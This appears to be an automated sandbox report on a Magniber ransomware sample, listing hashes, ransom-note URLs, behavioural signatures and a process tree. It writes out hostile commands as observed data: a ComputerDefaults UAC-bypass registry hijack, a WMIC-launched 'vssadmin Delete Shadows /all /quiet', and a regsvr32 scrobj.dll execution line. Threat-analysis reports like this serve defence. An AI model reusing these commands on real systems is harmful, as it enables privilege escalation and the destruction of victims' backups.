Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
139s -
max time network
123s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
18/11/2021, 13:16
Static task
static1
Behavioral task
behavioral1
Sample
1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Resource
win10-en-20211014
General
-
Target
1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
-
Size
22KB
-
MD5
7906dc475a8ae55ffb5af7fd3ac8f10a
-
SHA1
e7304e2436dc0eddddba229f1ec7145055030151
-
SHA256
1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
-
SHA512
c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1
Malware Config
Extracted
C:\Users\Admin\Desktop\readme.txt
magniber
http://ca74e800e27ca27068eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj
http://ca74e800e27ca27068eltalkfzj.jobsbig.cam/eltalkfzj
http://ca74e800e27ca27068eltalkfzj.boxgas.icu/eltalkfzj
http://ca74e800e27ca27068eltalkfzj.sixsees.club/eltalkfzj
http://ca74e800e27ca27068eltalkfzj.nowuser.casa/eltalkfzj
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 14 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4168 3148 cmd.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4160 3148 cmd.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4196 3148 cmd.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4188 3148 cmd.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4180 3148 cmd.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4508 3148 cmd.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4556 3148 cmd.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4592 3148 cmd.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4628 3148 cmd.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4620 3148 cmd.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4768 3148 cmd.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4832 3148 cmd.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4868 3148 cmd.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4880 3148 cmd.exe 107 -
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\ConfirmSplit.crw => C:\Users\Admin\Pictures\ConfirmSplit.crw.eltalkfzj sihost.exe File renamed C:\Users\Admin\Pictures\RedoApprove.raw => C:\Users\Admin\Pictures\RedoApprove.raw.eltalkfzj sihost.exe File renamed C:\Users\Admin\Pictures\RenameCheckpoint.tif => C:\Users\Admin\Pictures\RenameCheckpoint.tif.eltalkfzj sihost.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 2700 set thread context of 2348 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 14 PID 2700 set thread context of 2372 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 25 PID 2700 set thread context of 2720 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 38 PID 2700 set thread context of 3004 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 26 PID 2700 set thread context of 3472 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 35 PID 2700 set thread context of 3700 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 34 -
Program crash 1 IoCs
pid pid_target Process procid_target 1860 3700 WerFault.exe 34 -
Modifies registry class 29 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open sihost.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command svchost.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command taskhostw.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" sihost.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" taskhostw.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhostw.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" taskhostw.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 3052 notepad.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 1860 WerFault.exe 1860 WerFault.exe 1860 WerFault.exe 1860 WerFault.exe 1860 WerFault.exe 1860 WerFault.exe 1860 WerFault.exe 1860 WerFault.exe 1860 WerFault.exe 1860 WerFault.exe 1860 WerFault.exe 1860 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3004 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1860 WerFault.exe Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeIncreaseQuotaPrivilege 596 WMIC.exe Token: SeSecurityPrivilege 596 WMIC.exe Token: SeTakeOwnershipPrivilege 596 WMIC.exe Token: SeLoadDriverPrivilege 596 WMIC.exe Token: SeSystemProfilePrivilege 596 WMIC.exe Token: SeSystemtimePrivilege 596 WMIC.exe Token: SeProfSingleProcessPrivilege 596 WMIC.exe Token: SeIncBasePriorityPrivilege 596 WMIC.exe Token: SeCreatePagefilePrivilege 596 WMIC.exe Token: SeBackupPrivilege 596 WMIC.exe Token: SeRestorePrivilege 596 WMIC.exe Token: SeShutdownPrivilege 596 WMIC.exe Token: SeDebugPrivilege 596 WMIC.exe Token: SeSystemEnvironmentPrivilege 596 WMIC.exe Token: SeRemoteShutdownPrivilege 596 WMIC.exe Token: SeUndockPrivilege 596 WMIC.exe Token: SeManageVolumePrivilege 596 WMIC.exe Token: 33 596 WMIC.exe Token: 34 596 WMIC.exe Token: 35 596 WMIC.exe Token: 36 596 WMIC.exe Token: SeIncreaseQuotaPrivilege 3196 WMIC.exe Token: SeSecurityPrivilege 3196 WMIC.exe Token: SeTakeOwnershipPrivilege 3196 WMIC.exe Token: SeLoadDriverPrivilege 3196 WMIC.exe Token: SeSystemProfilePrivilege 3196 WMIC.exe Token: SeSystemtimePrivilege 3196 WMIC.exe Token: SeProfSingleProcessPrivilege 3196 WMIC.exe Token: SeIncBasePriorityPrivilege 3196 WMIC.exe Token: SeCreatePagefilePrivilege 3196 WMIC.exe Token: SeBackupPrivilege 3196 WMIC.exe Token: SeRestorePrivilege 3196 WMIC.exe Token: SeShutdownPrivilege 3196 WMIC.exe Token: SeDebugPrivilege 3196 WMIC.exe Token: SeSystemEnvironmentPrivilege 3196 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2348 wrote to memory of 3052 2348 sihost.exe 70 PID 2348 wrote to memory of 3052 2348 sihost.exe 70 PID 2348 wrote to memory of 1964 2348 sihost.exe 71 PID 2348 wrote to memory of 1964 2348 sihost.exe 71 PID 2348 wrote to memory of 360 2348 sihost.exe 73 PID 2348 wrote to memory of 360 2348 sihost.exe 73 PID 2348 wrote to memory of 1484 2348 sihost.exe 74 PID 2348 wrote to memory of 1484 2348 sihost.exe 74 PID 2372 wrote to memory of 64 2372 svchost.exe 78 PID 2372 wrote to memory of 64 2372 svchost.exe 78 PID 2372 wrote to memory of 2808 2372 svchost.exe 80 PID 2372 wrote to memory of 2808 2372 svchost.exe 80 PID 1484 wrote to memory of 596 1484 cmd.exe 82 PID 1484 wrote to memory of 596 1484 cmd.exe 82 PID 3004 wrote to memory of 1088 3004 Explorer.EXE 83 PID 3004 wrote to memory of 1088 3004 Explorer.EXE 83 PID 3004 wrote to memory of 348 3004 Explorer.EXE 84 PID 3004 wrote to memory of 348 3004 Explorer.EXE 84 PID 360 wrote to memory of 2636 360 cmd.exe 85 PID 360 wrote to memory of 2636 360 cmd.exe 85 PID 2808 wrote to memory of 3196 2808 cmd.exe 87 PID 2808 wrote to memory of 3196 2808 cmd.exe 87 PID 2720 wrote to memory of 1092 2720 taskhostw.exe 89 PID 2720 wrote to memory of 1092 2720 taskhostw.exe 89 PID 2720 wrote to memory of 3268 2720 taskhostw.exe 90 PID 2720 wrote to memory of 3268 2720 taskhostw.exe 90 PID 64 wrote to memory of 1520 64 cmd.exe 93 PID 64 wrote to memory of 1520 64 cmd.exe 93 PID 3472 wrote to memory of 2956 3472 RuntimeBroker.exe 94 PID 3472 wrote to memory of 2956 3472 RuntimeBroker.exe 94 PID 3472 wrote to memory of 2192 3472 RuntimeBroker.exe 95 PID 3472 wrote to memory of 2192 3472 RuntimeBroker.exe 95 PID 1088 wrote to memory of 3236 1088 cmd.exe 102 PID 1088 wrote to memory of 3236 1088 cmd.exe 102 PID 2700 wrote to memory of 3100 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 98 PID 2700 wrote to memory of 3100 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 98 PID 2700 wrote to memory of 3724 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 99 PID 2700 wrote to memory of 3724 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 99 PID 348 wrote to memory of 3960 348 cmd.exe 103 PID 348 wrote to memory of 3960 348 cmd.exe 103 PID 3268 wrote to memory of 3156 3268 cmd.exe 106 PID 3268 wrote to memory of 3156 3268 cmd.exe 106 PID 2700 wrote to memory of 3168 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 105 PID 2700 wrote to memory of 3168 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 105 PID 2700 wrote to memory of 1656 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 104 PID 2700 wrote to memory of 1656 2700 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 104 PID 1092 wrote to memory of 3104 1092 cmd.exe 110 PID 1092 wrote to memory of 3104 1092 cmd.exe 110 PID 2956 wrote to memory of 3296 2956 cmd.exe 111 PID 2956 wrote to memory of 3296 2956 cmd.exe 111 PID 2192 wrote to memory of 4000 2192 cmd.exe 112 PID 2192 wrote to memory of 4000 2192 cmd.exe 112 PID 3724 wrote to memory of 2604 3724 cmd.exe 113 PID 3724 wrote to memory of 2604 3724 cmd.exe 113 PID 3100 wrote to memory of 1760 3100 cmd.exe 115 PID 3100 wrote to memory of 1760 3100 cmd.exe 115 PID 1656 wrote to memory of 3484 1656 cmd.exe 114 PID 1656 wrote to memory of 3484 1656 cmd.exe 114 PID 3168 wrote to memory of 3480 3168 cmd.exe 116 PID 3168 wrote to memory of 3480 3168 cmd.exe 116 PID 4180 wrote to memory of 4368 4180 cmd.exe 127 PID 4180 wrote to memory of 4368 4180 cmd.exe 127 PID 4160 wrote to memory of 4388 4160 cmd.exe 129 PID 4160 wrote to memory of 4388 4160 cmd.exe 129
Processes
-
c:\windows\system32\sihost.exesihost.exe1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2348 -
\??\c:\windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:3052
-
-
\??\c:\windows\system32\cmd.execmd /c "start http://ca74e800e27ca27068eltalkfzj.jobsbig.cam/eltalkfzj^&1^&47006090^&79^&291^&2215063"2⤵PID:1964
-
-
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:360 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:2636
-
-
-
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:596
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2372 -
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:1520
-
-
-
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"2⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"4⤵PID:1760
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:3724 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"4⤵PID:2604
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"4⤵PID:3484
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"4⤵PID:3480
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:3236
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:348 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:3960
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3700
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3700 -s 8362⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1860
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\Windows\System32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:3296
-
-
-
C:\Windows\System32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:4000
-
-
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2720 -
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:3104
-
-
-
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:3268 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:3156
-
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4168 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4456
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4160 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4388
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4196 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4400
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4188 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4420
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4180 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4368
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4508 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4692
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4556 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4820
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4592 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4992
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4628 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:5032
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4620 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4964
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4768 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:5092
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4832 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4396
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4868 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:2928
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4880 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:1056
-